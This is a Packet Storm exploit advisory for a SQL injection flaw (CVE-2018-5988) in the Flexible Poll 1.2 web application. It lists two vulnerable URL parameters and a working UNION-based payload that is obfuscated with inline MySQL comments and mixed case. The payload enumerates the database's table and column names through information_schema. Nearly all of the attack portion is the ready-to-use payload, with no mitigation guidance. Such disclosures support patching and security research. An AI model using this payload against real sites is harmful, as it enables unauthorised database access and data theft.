Lucene search

K
packetstormIhsan SencanPACKETSTORM:146044
HistoryJan 24, 2018 - 12:00 a.m.

Flexible Poll 1.2 SQL Injection

2018-01-2400:00:00
Ihsan Sencan
packetstormsecurity.com
53

0.003 Low

EPSS

Percentile

68.6%

`# # # # #   
# Exploit Title: Flexible Poll 1.2 - SQL Injection  
# Dork: N/A  
# Date: 23.01.2018  
# Vendor Homepage: http://ddywpro.com/  
# Software Link: https://codecanyon.net/item/flexible-poll/4363114  
# Version: 1.2  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-5988  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
#   
# 1)  
# http://localhost/[PATH]/index.php?id=[SQL]  
#   
# 2)  
# http://localhost/[PATH]/mobile_preview.php?id=[SQL]  
#   
# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-  
#   
# # # # #  
  
`

0.003 Low

EPSS

Percentile

68.6%